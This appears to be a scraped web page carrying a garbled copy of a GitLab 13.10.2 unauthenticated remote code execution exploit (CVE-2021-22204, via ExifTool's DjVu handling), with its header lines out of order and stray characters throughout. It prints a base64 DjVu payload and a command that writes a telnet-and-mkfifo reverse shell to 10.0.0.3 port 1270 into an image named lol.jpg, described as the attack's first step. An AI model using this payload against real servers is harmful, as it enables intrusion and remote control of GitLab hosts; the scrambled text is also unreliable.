![]() ![]() "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="Įcho -n 'TF=$(mktemp -u) mkfifo $TF & telnet 10.0.0.3 1270 0$TF' > lol.jpg ![]() This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270. First generating the payload and then sending it.ġ. As such, exploitation of GitLab takes two steps. # Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)Ĭode execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). # Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8 # Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) ![]()
0 Comments
Leave a Reply. |